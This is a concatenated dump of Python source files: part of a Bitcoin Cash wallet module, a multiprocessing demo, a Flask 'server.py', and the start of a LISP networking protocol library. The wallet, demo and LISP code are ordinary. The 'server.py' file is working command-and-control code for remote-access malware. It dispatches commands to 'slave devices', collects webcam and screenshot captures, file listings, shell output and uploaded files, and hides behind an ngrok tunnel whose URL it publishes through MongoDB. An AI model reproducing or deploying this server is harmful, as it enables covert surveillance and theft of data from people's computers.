''' This is an advanced function for use in the GUI when the user
wants to resynch the whole wallet from scratch, preserving labels
and contacts. '''
if not self.network or not self.network.is_connected():
raise RuntimeError('Refusing to rebuild wallet without a valid server connection!')
if not self.synchronizer or not self.verifier:
raise RuntimeError('Refusing to rebuild a stopped wallet!')
network = self.network
self.stop_threads()
do_addr_save = False
with self.lock:
self.transactions.clear(); self.unverified_tx.clear(); self.verified_tx.clear()
self.clear_history()
if isinstance(self, Standard_Wallet):
# reset the address list to default too, just in case. New synchronizer will pick up the addresses again.
self.receiving_addresses, self.change_addresses = self.receiving_addresses[:self.gap_limit], self.change_addresses[:self.gap_limit_for_change]
do_addr_save = True
self.change_reserved.clear()
self.change_reserved_default.clear()
self.change_unreserved.clear()
self.change_reserved_tmp.clear()
self.invalidate_address_set_cache()
if do_addr_save:
self.save_addresses()
self.save_transactions()
self.save_change_reservations()
self.save_verified_tx() # implicit cashacct.save
self.storage.write()
self.start_threads(network)
self.network.trigger_callback('wallet_updated', self)
def is_schnorr_possible(self, reason: list = None) -> bool:
''' Returns True if this wallet type is compatible.
`reason` is an optional list where you would like a translated string
of why Schnorr isn't possible placed (on False return). '''
ok = bool(not self.is_multisig() and not self.is_hardware())
if not ok and isinstance(reason, list):
reason.insert(0, _('Schnorr signatures are disabled for this wallet type.'))
return ok
def is_schnorr_enabled(self) -> bool:
''' Returns whether schnorr is enabled AND possible for this wallet.
Schnorr is enabled per-wallet. '''
if not self.is_schnorr_possible():
# Short-circuit out of here -- it's not even possible with this
# wallet type.
return False
ss_cfg = self.storage.get('sign_schnorr', None)
if ss_cfg is None:
# Schnorr was not set in config; figure out intelligent defaults,
# preferring Schnorr if it's at least as fast as ECDSA (based on
# which libs user has installed). Note for watching-only we default
# to off if unspecified regardless, to not break compatibility
# with air-gapped signing systems that have older EC installed
# on the signing system. This is to avoid underpaying fees if
# signing system doesn't use Schnorr. We can turn on default
# Schnorr on watching-only sometime in the future after enough
# time has passed that air-gapped systems are unlikely to not
# have Schnorr enabled by default.
# TO DO: Finish refactor of txn serialized format to handle this
# case better!
if (not self.is_watching_only()
and (schnorr.has_fast_sign()
or not ecc_fast.is_using_fast_ecc())):
# Prefer Schnorr, all things being equal.
# - If not watching-only & schnorr possible AND
# - Either Schnorr is fast sign (native, ABC's secp256k1),
# so use it by default
# - Or both ECDSA & Schnorr are slow (non-native);
# so use Schnorr in that case as well
ss_cfg = 2
else:
# This branch is reached if Schnorr is slow but ECDSA is fast
# (core's secp256k1 lib was found which lacks Schnorr) -- so we
# default it to off. Also if watching only we default off.
ss_cfg = 0
return bool(ss_cfg)
def set_schnorr_enabled(self, b: bool):
''' Enable schnorr for this wallet. Note that if Schnorr is not possible,
(due to missing libs or invalid wallet type) is_schnorr_enabled() will
still return False after calling this function with a True argument. '''
# Note: we will have '1' at some point in the future which will mean:
# 'ask me per tx', so for now True -> 2.
self.storage.put('sign_schnorr', 2 if b else 0)
class Simple_Wallet(Abstract_Wallet):
# wallet with a single keystore
def get_keystore(self):
return self.keystore
def get_keystores(self):
return [self.keystore]
def is_watching_only(self):
return self.keystore.is_watching_only()
def can_change_password(self):
return self.keystore.can_change_password()
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
if self.keystore is not None and self.keystore.can_change_password():
self.keystore.update_password(old_pw, new_pw)
self.save_keystore()
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
class ImportedWalletBase(Simple_Wallet):
txin_type = 'p2pkh'
def get_txin_type(self, address):
return self.txin_type
def can_delete_address(self):
return len(self.get_addresses()) > 1 # Cannot delete the last address
def has_seed(self):
return False
def is_deterministic(self):
return False
def is_change(self, address):
return False
def get_master_public_keys(self):
return []
def is_beyond_limit(self, address, is_change):
return False
def get_fingerprint(self):
return ''
def get_receiving_addresses(self):
return self.get_addresses()
def delete_address(self, address):
assert isinstance(address, Address)
all_addrs = self.get_addresses()
if len(all_addrs) <= 1 or address not in all_addrs:
return
del all_addrs
transactions_to_remove = set() # only referred to by this address
transactions_new = set() # txs that are not only referred to by address
with self.lock:
for addr, details in self._history.items():
if addr == address:
for tx_hash, height in details:
transactions_to_remove.add(tx_hash)
self.tx_addr_hist[tx_hash].discard(address)
if not self.tx_addr_hist.get(tx_hash):
self.tx_addr_hist.pop(tx_hash, None)
else:
for tx_hash, height in details:
transactions_new.add(tx_hash)
transactions_to_remove -= transactions_new
self._history.pop(address, None)
for tx_hash in transactions_to_remove:
self.remove_transaction(tx_hash)
self.tx_fees.pop(tx_hash, None)
self.verified_tx.pop(tx_hash, None)
self.unverified_tx.pop(tx_hash, None)
self.transactions.pop(tx_hash, None)
self._addr_bal_cache.pop(address, None) # not strictly necessary, above calls also have this side-effect. but here to be safe. :)
if self.verifier:
# TX is now gone. Toss its SPV proof in case we have it
# in memory. This allows user to re-add PK again and it
# will avoid the situation where the UI says "not verified"
# erroneously!
self.verifier.remove_spv_proof_for_tx(tx_hash)
# FIXME: what about pruned_txo?
self.storage.put('verified_tx3', self.verified_tx)
self.save_transactions()
self.set_label(address, None)
self.remove_payment_request(address, {})
self.set_frozen_state([address], False)
self.delete_address_derived(address)
self.cashacct.on_address_deletion(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
class ImportedAddressWallet(ImportedWalletBase):
# Watch-only wallet of imported addresses
wallet_type = 'imported_addr'
def __init__(self, storage):
self._sorted = None
super().__init__(storage)
@classmethod
def from_text(cls, storage, text):
wallet = cls(storage)
for address in text.split():
wallet.import_address(Address.from_string(address))
return wallet
def is_watching_only(self):
return True
def get_keystores(self):
return []
def can_import_privkey(self):
return False
def load_keystore(self):
self.keystore = None
def save_keystore(self):
pass
def load_addresses(self):
addresses = self.storage.get('addresses', [])
self.addresses = [Address.from_string(addr) for addr in addresses]
def save_addresses(self):
self.storage.put('addresses', [addr.to_storage_string()
for addr in self.addresses])
self.storage.write()
def can_change_password(self):
return False
def can_import_address(self):
return True
def get_addresses(self, include_change=False):
if not self._sorted:
self._sorted = sorted(self.addresses,
key=lambda addr: addr.to_ui_string())
return self._sorted
def import_address(self, address):
assert isinstance(address, Address)
if address in self.addresses:
return False
self.addresses.append(address)
self.add_address(address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if already wrote in previous call
self._sorted = None
return True
def delete_address_derived(self, address):
self.addresses.remove(address)
self._sorted.remove(address)
def add_input_sig_info(self, txin, address):
x_pubkey = 'fd' + address.to_script_hex()
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
class ImportedPrivkeyWallet(ImportedWalletBase):
# wallet made of imported private keys
wallet_type = 'imported_privkey'
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
@classmethod
def from_text(cls, storage, text, password=None):
wallet = cls(storage)
storage.put('use_encryption', bool(password))
for privkey in text.split():
wallet.import_private_key(privkey, password)
return wallet
def is_watching_only(self):
return False
def get_keystores(self):
return [self.keystore]
def can_import_privkey(self):
return True
def load_keystore(self):
if self.storage.get('keystore'):
self.keystore = load_keystore(self.storage, 'keystore')
else:
self.keystore = Imported_KeyStore({})
def save_keystore(self):
self.storage.put('keystore', self.keystore.dump())
def load_addresses(self):
pass
def save_addresses(self):
pass
def can_change_password(self):
return True
def can_import_address(self):
return False
def get_addresses(self, include_change=False):
return self.keystore.get_addresses()
def delete_address_derived(self, address):
self.keystore.remove_address(address)
self.save_keystore()
def get_address_index(self, address):
return self.get_public_key(address)
def get_public_key(self, address):
return self.keystore.address_to_pubkey(address)
def import_private_key(self, sec, pw):
pubkey = self.keystore.import_privkey(sec, pw)
self.save_keystore()
self.add_address(pubkey.address)
self.cashacct.save()
self.save_addresses()
self.storage.write() # no-op if above already wrote
return pubkey.address.to_ui_string()
def export_private_key(self, address, password):
'''Returned in WIF format.'''
pubkey = self.keystore.address_to_pubkey(address)
return self.keystore.export_private_key(pubkey, password)
def add_input_sig_info(self, txin, address):
assert txin['type'] == 'p2pkh'
pubkey = self.keystore.address_to_pubkey(address)
txin['num_sig'] = 1
txin['x_pubkeys'] = [pubkey.to_ui_string()]
txin['signatures'] = [None]
def pubkeys_to_address(self, pubkey):
pubkey = PublicKey.from_string(pubkey)
if pubkey in self.keystore.keypairs:
return pubkey.address
class Deterministic_Wallet(Abstract_Wallet):
def __init__(self, storage):
Abstract_Wallet.__init__(self, storage)
self.gap_limit = storage.get('gap_limit', 20)
def has_seed(self):
return self.keystore.has_seed()
def get_receiving_addresses(self):
return self.receiving_addresses
def get_change_addresses(self):
return self.change_addresses
def get_seed(self, password):
return self.keystore.get_seed(password)
def add_seed(self, seed, pw):
self.keystore.add_seed(seed, pw)
def change_gap_limit(self, value):
'''This method is not called in the code, it is kept for console use'''
with self.lock:
if value >= self.gap_limit:
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
return True
elif value >= self.min_acceptable_gap():
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
n = len(addresses) - k + value
self.receiving_addresses = self.receiving_addresses[0:n]
self.gap_limit = value
self.storage.put('gap_limit', self.gap_limit)
self.save_addresses()
return True
else:
return False
def num_unused_trailing_addresses(self, addresses):
'''This method isn't called anywhere. Perhaps it is here for console use.
Can't be sure. -Calin '''
with self.lock:
k = 0
for addr in reversed(addresses):
if addr in self._history:
break
k = k + 1
return k
def min_acceptable_gap(self):
''' Caller needs to hold self.lock otherwise bad things may happen. '''
# fixme: this assumes wallet is synchronized
n = 0
nmax = 0
addresses = self.get_receiving_addresses()
k = self.num_unused_trailing_addresses(addresses)
for a in addresses[0:-k]:
if a in self._history:
n = 0
else:
n += 1
if n > nmax: nmax = n
return nmax + 1
def create_new_address(self, for_change=False, save=True):
for_change = bool(for_change)
with self.lock:
addr_list = self.change_addresses if for_change else self.receiving_addresses
n = len(addr_list)
x = self.derive_pubkeys(for_change, n)
address = self.pubkeys_to_address(x)
addr_list.append(address)
if save:
self.save_addresses()
self.add_address(address)
return address
def synchronize_sequence(self, for_change):
limit = self.gap_limit_for_change if for_change else self.gap_limit
while True:
addresses = self.get_change_addresses() if for_change else self.get_receiving_addresses()
if len(addresses) < limit:
self.create_new_address(for_change, save=False)
continue
if all(map(lambda a: not self.address_is_old(a), addresses[-limit:] )):
break
else:
self.create_new_address(for_change, save=False)
def synchronize(self):
with self.lock:
self.synchronize_sequence(False)
self.synchronize_sequence(True)
def is_beyond_limit(self, address, is_change):
with self.lock:
if is_change:
addr_list = self.get_change_addresses()
limit = self.gap_limit_for_change
else:
addr_list = self.get_receiving_addresses()
limit = self.gap_limit
idx = addr_list.index(address)
if idx < limit:
return False
for addr in addr_list[-limit:]:
if addr in self._history:
return False
return True
def get_master_public_keys(self):
return [self.get_master_public_key()]
def get_fingerprint(self):
return self.get_master_public_key()
def get_txin_type(self, address):
return self.txin_type
class Simple_Deterministic_Wallet(Simple_Wallet, Deterministic_Wallet):
""" Deterministic Wallet with a single pubkey per address """
def __init__(self, storage):
Deterministic_Wallet.__init__(self, storage)
def get_public_key(self, address):
sequence = self.get_address_index(address)
pubkey = self.get_pubkey(*sequence)
return pubkey
def load_keystore(self):
self.keystore = load_keystore(self.storage, 'keystore')
try:
xtype = bitcoin.xpub_type(self.keystore.xpub)
except:
xtype = 'standard'
self.txin_type = 'p2pkh' if xtype == 'standard' else xtype
def get_pubkey(self, c, i):
return self.derive_pubkeys(c, i)
def get_public_keys(self, address):
return [self.get_public_key(address)]
def add_input_sig_info(self, txin, address):
derivation = self.get_address_index(address)
x_pubkey = self.keystore.get_xpubkey(*derivation)
txin['x_pubkeys'] = [x_pubkey]
txin['signatures'] = [None]
txin['num_sig'] = 1
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def derive_pubkeys(self, c, i):
return self.keystore.derive_pubkey(c, i)
class Standard_Wallet(Simple_Deterministic_Wallet):
wallet_type = 'standard'
def pubkeys_to_address(self, pubkey):
return Address.from_pubkey(pubkey)
class Multisig_Wallet(Deterministic_Wallet):
# generic m of n
gap_limit = 20
def __init__(self, storage):
self.wallet_type = storage.get('wallet_type')
self.m, self.n = multisig_type(self.wallet_type)
Deterministic_Wallet.__init__(self, storage)
def get_pubkeys(self, c, i):
return self.derive_pubkeys(c, i)
def pubkeys_to_address(self, pubkeys):
pubkeys = [bytes.fromhex(pubkey) for pubkey in pubkeys]
redeem_script = self.pubkeys_to_redeem_script(pubkeys)
return Address.from_multisig_script(redeem_script)
def pubkeys_to_redeem_script(self, pubkeys):
return Script.multisig_script(self.m, sorted(pubkeys))
def derive_pubkeys(self, c, i):
return [k.derive_pubkey(c, i) for k in self.get_keystores()]
def load_keystore(self):
self.keystores = {}
for i in range(self.n):
name = 'x%d/'%(i+1)
self.keystores[name] = load_keystore(self.storage, name)
self.keystore = self.keystores['x1/']
xtype = bitcoin.xpub_type(self.keystore.xpub)
self.txin_type = 'p2sh' if xtype == 'standard' else xtype
def save_keystore(self):
for name, k in self.keystores.items():
self.storage.put(name, k.dump())
def get_keystore(self):
return self.keystores.get('x1/')
def get_keystores(self):
return [self.keystores[i] for i in sorted(self.keystores.keys())]
def update_password(self, old_pw, new_pw, encrypt=False):
if old_pw is None and self.has_password():
raise InvalidPassword()
for name, keystore in self.keystores.items():
if keystore.can_change_password():
keystore.update_password(old_pw, new_pw)
self.storage.put(name, keystore.dump())
self.storage.set_password(new_pw, encrypt)
self.storage.write()
def has_seed(self):
return self.keystore.has_seed()
def can_change_password(self):
return self.keystore.can_change_password()
def is_watching_only(self):
        return all(k.is_watching_only() for k in self.get_keystores())
def get_master_public_key(self):
return self.keystore.get_master_public_key()
def get_master_public_keys(self):
return [k.get_master_public_key() for k in self.get_keystores()]
def get_fingerprint(self):
return ''.join(sorted(self.get_master_public_keys()))
def add_input_sig_info(self, txin, address):
# x_pubkeys are not sorted here because it would be too slow
# they are sorted in transaction.get_sorted_pubkeys
derivation = self.get_address_index(address)
txin['x_pubkeys'] = [k.get_xpubkey(*derivation) for k in self.get_keystores()]
txin['pubkeys'] = None
# we need n place holders
txin['signatures'] = [None] * self.n
txin['num_sig'] = self.m
def is_multisig(self):
return True
wallet_types = ['standard', 'multisig', 'imported']
def register_wallet_type(category):
wallet_types.append(category)
wallet_constructors = {
'standard': Standard_Wallet,
'old': Standard_Wallet,
'xpub': Standard_Wallet,
'imported_privkey': ImportedPrivkeyWallet,
'imported_addr': ImportedAddressWallet,
}
def register_constructor(wallet_type, constructor):
wallet_constructors[wallet_type] = constructor
class UnknownWalletType(RuntimeError):
''' Raised if encountering an unknown wallet type '''
pass
# former WalletFactory
class Wallet:
"""The main wallet "entry point".
This class is actually a factory that will return a wallet of the correct
type when passed a WalletStorage instance."""
def __new__(self, storage):
wallet_type = storage.get('wallet_type')
WalletClass = Wallet.wallet_class(wallet_type)
wallet = WalletClass(storage)
# Convert hardware wallets restored with older versions of
# Electrum to BIP44 wallets. A hardware wallet does not have
# a seed and plugins do not need to handle having one.
rwc = getattr(wallet, 'restore_wallet_class', None)
if rwc and storage.get('seed', ''):
storage.print_error("converting wallet type to " + rwc.wallet_type)
storage.put('wallet_type', rwc.wallet_type)
wallet = rwc(storage)
return wallet
@staticmethod
def wallet_class(wallet_type):
if multisig_type(wallet_type):
return Multisig_Wallet
if wallet_type in wallet_constructors:
return wallet_constructors[wallet_type]
raise UnknownWalletType("Unknown wallet type: " + str(wallet_type))
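# Illustrative sketch of the factory above (the wallet path is hypothetical;
# WalletStorage comes from this package's storage module):
#
#   storage = WalletStorage('/path/to/wallet_file')
#   wallet = Wallet(storage)          # returns Standard_Wallet, Multisig_Wallet, ...
#   wallet.start_threads(network)     # 'network' as provided by the daemon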
def create_new_wallet(*, path, config, passphrase=None, password=None,
encrypt_file=True, seed_type=None, gap_limit=None) -> dict:
"""Create a new wallet"""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
from .mnemonic import Mnemonic_Electrum, Mnemonic
if seed_type == 'electrum':
seed = Mnemonic_Electrum('en').make_seed()
else:
seed = Mnemonic('en').make_seed()
k = keystore.from_seed(seed, passphrase, seed_type = seed_type)
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
storage.put('seed_type', seed_type)
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = "Please keep your seed in a safe place; if you lose it, you will not be able to restore your wallet."
wallet.storage.write()
return {'seed': seed, 'wallet': wallet, 'msg': msg}
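# Illustrative sketch (hypothetical path; `config` is the config object callers
# of this module already pass around):
#
#   d = create_new_wallet(path='/tmp/new_wallet', config=config, password='pw')
#   print(d['seed'])      # back this up!
#   wallet = d['wallet']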
def restore_wallet_from_text(text, *, path, config,
passphrase=None, password=None, encrypt_file=True,
gap_limit=None) -> dict:
"""Restore a wallet from text. Text can be a seed phrase, a master
public key, a master private key, a list of bitcoin addresses
or bitcoin private keys."""
storage = WalletStorage(path)
if storage.file_exists():
raise Exception("Remove the existing wallet first!")
text = text.strip()
if keystore.is_address_list(text):
wallet = ImportedAddressWallet.from_text(storage, text)
wallet.save_addresses()
    elif keystore.is_private_key_list(text):
k = keystore.Imported_KeyStore({})
storage.put('keystore', k.dump())
wallet = ImportedPrivkeyWallet.from_text(storage, text, password)
else:
if keystore.is_master_key(text):
k = keystore.from_master_key(text)
elif keystore.is_seed(text):
k = keystore.from_seed(text, passphrase) # auto-detects seed type, preference order: old, electrum, bip39
else:
raise Exception("Seed or key not recognized")
storage.put('keystore', k.dump())
storage.put('wallet_type', 'standard')
seed_type = getattr(k, 'seed_type', None)
if seed_type:
storage.put('seed_type', seed_type) # Save, just in case
if gap_limit is not None:
storage.put('gap_limit', gap_limit)
wallet = Wallet(storage)
wallet.update_password(old_pw=None, new_pw=password, encrypt=encrypt_file)
wallet.synchronize()
msg = ("This wallet was restored offline. It may contain more addresses than displayed. "
"Start a daemon and use load_wallet to sync its history.")
wallet.storage.write()
return {'wallet': wallet, 'msg': msg}
|
multip.py
|
from multiprocessing import Process, Value
import os
def info(title):
print(title)
print('module name:', __name__)
print('parent process:', os.getppid())
print('process id:', os.getpid())
def f(name):
info('function f')
print('hello', name)
if __name__ == '__main__':
info('main line')
p = Process(target=f, args=('bob',))
p.start()
p.join()
|
server.py
|
import numpy
import os
import json
from flask import *
from threading import Thread
import requests
import pymongo
from werkzeug.utils import secure_filename
api = Flask(__name__)
# this dict holds the device name, the command code to be executed, and its data
cmdArray = {'deviceName': '', 'command': 0, 'data': ''}
# this dict holds the most recent console/shell output reported by a client
shellArr = {'shell': ''}
# initiates mongodb
client = pymongo.MongoClient("mongodb+srv://{username}:{password}@cluster0.qajos.mongodb.net/myFirstDatabase?retryWrites=true&w=majority")
conn = client.main
col = conn.server
# for screenshot and webcam pic
@api.route('/webcam-ss', methods=['POST'])
def ss():
file = request.files['file']
if file.filename != '':
filename = secure_filename(file.filename)
file.save(os.path.join(os.getcwd(), filename))
else:
return 'error'
cmdArray['command'] = 0
cmdArray['deviceName'] = ''
cmdArray['data'] = ''
return 'success'
# manages file browser commands and response
@api.route('/browse-files', methods=['POST'])
def browse_files():
global shellArr
req = request.data.decode("utf-8")
final = numpy.asarray(json.loads(req)['data'])
# appends new data
shellArr['shell'] = str(final)
cmdArray['command'] = 0
cmdArray['deviceName'] = ''
cmdArray['data'] = ''
return 'success'
# saves the file that is sent by the client
@api.route('/save-file', methods=['POST'])
def save_file():
# saves the received file locally
file = request.files['file']
if file.filename != '':
filename = secure_filename(file.filename)
file.save(os.path.join(os.getcwd(), filename))
else:
return 'error'
cmdArray['command'] = 0
cmdArray['deviceName'] = ''
cmdArray['data'] = ''
return 'success'
# takes command from the master command center
@api.route('/command', methods=['POST'])
def cmd():
req = request.data.decode("utf-8")
# checks if master command center credentials are correct
if str(json.loads(req)['admin']) == 'admin':
if str(json.loads(req)['id']) == '1':
# updates the array with command to be executed along with the command id
cmdArray['deviceName'] = str(json.loads(req)['deviceName'])
cmdArray['command'] = 1
cmdArray['data'] = str(json.loads(req)['data'])
return 'success'
if str(json.loads(req)['id']) == '2':
# updates the array with command to be executed along with the command id
cmdArray['deviceName'] = str(json.loads(req)['deviceName'])
cmdArray['command'] = 2
cmdArray['data'] = str(json.loads(req)['data'])
return 'success'
if str(json.loads(req)['id']) == '3':
# updates the array with command to be executed along with the command id
cmdArray['deviceName'] = str(json.loads(req)['deviceName'])
cmdArray['command'] = 3
cmdArray['data'] = str(json.loads(req)['data'])
return 'success'
if str(json.loads(req)['id']) == '4':
# updates the array with command to be executed along with the command id
cmdArray['deviceName'] = str(json.loads(req)['deviceName'])
cmdArray['command'] = 4
cmdArray['data'] = str(json.loads(req)['data'])
return 'success'
else:
return 'fail'
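# Illustrative sketch of the request body the /command endpoint above expects
# from the master command center (values and `server_url` are hypothetical):
#
#   body = '{"admin": "admin", "id": "1", "deviceName": "slave-01", "data": "whoami"}'
#   requests.post(server_url + '/command', data=body)   # -> 'success' or 'fail'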
# this is used by slave devices to check if there are any commands to be executed
@api.route('/check', methods=['GET'])
def check():
return jsonify(cmdArray)
# returns shell data
@api.route('/get-data', methods=['GET'])
def get_data():
return jsonify(shellArr)
# adds client computer name to the database
@api.route('/add', methods=['POST'])
def add():
req = request.data.decode("utf-8")
col0 = conn.slave
array = list(col0.find({'id': json.loads(req)['id']}))
if str(array) == '[]':
mydict = { "id": json.loads(req)['id'] }
col0.insert_one(mydict)
try:
if array[0]['id'] == None:
mydict = { "id": str(array[0]['id']) }
mydict0 = {"$set": { "id": json.loads(req)['id'] } }
col0.update_one(mydict, mydict0)
except:
pass
else:
mydict = { "id": str(array[0]['id']) }
mydict0 = {"$set": { "id": json.loads(req)['id'] } }
col0.update_one(mydict, mydict0)
return 'success'
# initiates ngrok
def main():
os.system('"ngrok http 3000 -host-header="localhost:3000" --log=stdout > ngrok.log &"')
# creates and updates new public url to mongodb
def mongo():
# creates ngrok url
def ngrok_url():
url = "http://127.0.0.1:4040/api/tunnels"
try:
response = requests.get(url)
url_new_https = response.json()["tunnels"][0]["public_url"]
return str(url_new_https)
        except:
            # ngrok may not be up yet; retry and propagate the result
            return ngrok_url()
# updates mongodb cluster with new ngrok url
array = list(col.find({'p63': 'p63'}))
if str(array) == '[]':
mydict = { 'p63': 'p63', "server": ngrok_url() }
col.insert_one(mydict)
try:
if array[0]['server'] == None:
mydict = { "server": str(array[0]['server']) }
mydict0 = {"$set": { "server": ngrok_url() } }
col.update_one(mydict, mydict0)
except:
pass
else:
mydict = { "server": str(array[0]['server']) }
mydict0 = {"$set": { "server": ngrok_url() } }
col.update_one(mydict, mydict0)
if __name__ == '__main__':
Thread(target = main).start()
mongo()
api.run(host='localhost', port='3000')
|
lisp.py
|
# -----------------------------------------------------------------------------
#
# Copyright 2013-2019 lispers.net - Dino Farinacci <farinacci@gmail.com>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# -----------------------------------------------------------------------------
#
# lisp.py
#
# This file contains all constants, definitions, data structures, packet
# send and receive functions for the LISP protocol according to RFC 6830.
#
#------------------------------------------------------------------------------
from __future__ import print_function
from __future__ import division
from future import standard_library
standard_library.install_aliases()
from builtins import hex
from builtins import str
from builtins import int
from builtins import range
from builtins import object
from past.utils import old_div
import socket
import time
import struct
import binascii
import hmac
import hashlib
import datetime
import os
import sys
import random
import threading
import operator
import netifaces
import platform
import traceback
from Crypto.Cipher import AES
import ecdsa
import json
import copy
import chacha
import poly1305
import geopy
import curve25519
from subprocess import getoutput
import queue
import distro
import pprint
#
# For printing the lisp_rloc_probe_list{}.
#
lisp_print_rloc_probe_list = False
#------------------------------------------------------------------------------
#
# Global variables.
#
lisp_hostname = ""
lisp_version = ""
lisp_uptime = ""
lisp_i_am_core = False
lisp_i_am_itr = False
lisp_i_am_etr = False
lisp_i_am_rtr = False
lisp_i_am_mr = False
lisp_i_am_ms = False
lisp_i_am_ddt = False
lisp_log_id = ""
lisp_debug_logging = True
lisp_map_notify_queue = {} # Key is concat of nonce and etr address
lisp_map_servers_list = {} # Key is ms-name/address string, value lisp_ms()
lisp_ddt_map_requestQ = {}
lisp_db_list = [] # Elements are class lisp_mapping()
lisp_group_mapping_list = {} # Elements are class lisp_group_mapping()
lisp_map_resolvers_list = {} # Key is mr-name/address string, value lisp_mr()
lisp_rtr_list = {} # Key is address string, value is lisp_address()
lisp_elp_list = {}
lisp_rle_list = {}
lisp_geo_list = {}
lisp_json_list = {}
lisp_myrlocs = [None, None, None]
lisp_mymacs = {}
#
# Used for multi-tenancy. The first dictionary array is indexed by device name
# and the second one has value lisp_interface() indexed by an instance-id string.
#
lisp_myinterfaces = {}
lisp_iid_to_interface = {}
lisp_multi_tenant_interfaces = []
lisp_test_mr_timer = None
lisp_rloc_probe_timer = None
#
# Stats variables.
#
lisp_registered_count = 0
#
# For tracking Map-Requesters behind NAT devices.
#
lisp_info_sources_by_address = {}
lisp_info_sources_by_nonce = {}
#
# Store computed keys per RLOC. The key is the nonce from the Map-Request
# at the time the g, p, and public-key values are created. The value is an
# array of 4 elements, indexed by key-id.
#
lisp_crypto_keys_by_nonce = {}
lisp_crypto_keys_by_rloc_encap = {} # Key is "<rloc>:<port>" tuple
lisp_crypto_keys_by_rloc_decap = {} # Key is "<rloc>:<port>" tuple
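#
# Illustrative (hypothetical) shape of the key dictionaries above:
#   lisp_crypto_keys_by_rloc_encap["10.0.0.1:4341"] = [None, <key-id-1 state>, None, None]
# where each non-None slot holds the negotiated crypto state for that key-id.
#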
lisp_data_plane_security = False
lisp_search_decap_keys = True
lisp_data_plane_logging = False
lisp_frame_logging = False
lisp_flow_logging = False
#
# When NAT-traversal is enabled and lisp-crypto is enabled, an ITR needs
# to send RLOC-probe requests with an ephemeral port that is also used
# for data encapsulation to the RTR. This way the RTR can find the crypto
# key when multiple xTRs are behind the same NAT.
#
lisp_crypto_ephem_port = None
#
# Is the lisp-itr process running as a PITR?
#
lisp_pitr = False
#
# Are we listening on all MAC frames?
#
lisp_l2_overlay = False
#
# RLOC-probing variables. And for NAT-traversal, register only reachable
# RTRs which is determined from the lisp_rloc_probe_list.
#
lisp_rloc_probing = False
lisp_rloc_probe_list = {}
#
# Command "lisp xtr-parameters" register-reachabile-rtrs has opposite polarity
# to lisp_register_all_rtrs. So by default we do not consider RLOC-probing
# reachability status in registering RTRs to the mapping system.
#
lisp_register_all_rtrs = True
#
# Nonce Echo variables.
#
lisp_nonce_echoing = False
lisp_nonce_echo_list = {}
#
# xTR configuration parameters.
#
lisp_nat_traversal = False
#
# xTR configuration parameters. This flag is used to indicate that when a
# map-cache entry is created or updated, we write specific information
# to, say, a Broadcom chip, that will do VXLAN encapsulation. This is a way
# to get existing hardware to do L3 overlays with the LISP control-plane
# when all it supports is VXLAN. See lisp_program_vxlan_hardware()
#
lisp_program_hardware = False
#
# Should we write to the lisp.checkpoint file.
#
lisp_checkpoint_map_cache = False
lisp_checkpoint_filename = "./lisp.checkpoint"
#
# Should we write map-cache entries to a named socket for another data-plane?
#
lisp_ipc_data_plane = False
lisp_ipc_dp_socket = None
lisp_ipc_dp_socket_name = "lisp-ipc-data-plane"
#
# This lock is used so the lisp-core process doesn't intermix command
# processing data with show data and packet data.
#
lisp_ipc_lock = None
#
# Use this as a default instance-ID when there are no "lisp interface" commands
# configured. This default instance-ID is taken from the first database-mapping
# command.
#
lisp_default_iid = 0
lisp_default_secondary_iid = 0
#
# Configured list of RTRs that the lisp-core process will insert into
# Info-Reply messages.
#
lisp_ms_rtr_list = [] # Array of type lisp.lisp_address()
#
# Used in an RTR to store a translated port for a translated RLOC. The key is
# the hostname that is sent in an Info-Request; the value is a nested array.
# See lisp_store_nat_info() for details.
#
lisp_nat_state_info = {}
#
# Used for doing global rate-limiting of Map-Requests. When the process
# starts up or the map-cache is cleared by the user, we don't do rate-limiting
# for 1 minute so we can load up the cache quicker.
#
lisp_last_map_request_sent = None
lisp_no_map_request_rate_limit = time.time()
#
# Used for doing global rate-limiting of ICMP Too Big messages.
#
lisp_last_icmp_too_big_sent = 0
#
# Array to store 1000 flows.
#
LISP_FLOW_LOG_SIZE = 100
lisp_flow_log = []
#
# Store configured or API added policy parameters.
#
lisp_policies = {}
#
# Load-split pings. We'll hash the first long-word of an ICMP echo-request
# and echo-reply for testing purposes, to show per-packet load-splitting.
#
lisp_load_split_pings = False
#
# This array is a configured list of IPv6-prefixes that define what part
# of a matching address is used as the crypto-hash. They must be on 4-bit
# boundaries for easy matching.
#
lisp_eid_hashes = []
#
# IPv4 reassembly buffer. We pcap-capture IPv4 fragments. They can come to the
# ETR when IPv6 is encapsulated in IPv4 and we have an MTU violation for the
# encapsulated packet. The array is indexed by the IPv4 ident field and contains
# an array of packet buffers. Once all fragments have arrived, the IP header
# is removed from all fragments except the first one.
#
lisp_reassembly_queue = {}
#
# Map-Server pubsub cache. Remember Map-Requesters that set the N-bit for
# an EID target they are requesting. Key is EID-prefix in string format with
# bracketed instance-ID included in slash format. The value of the dictionary
# array is a dictionary array of ITR addresses in string format.
#
lisp_pubsub_cache = {}
#
# When "decentralized-push-xtr = yes" is configured, the xTR is also running as
# a Map-Server and Map-Resolver. So Map-Register messages the ETR sends are
# looped back to the lisp-ms process.
#
lisp_decent_push_configured = False
#
# When "decentralized-pull-xtr-[modulus,dns-suffix] is configured, the xTR is
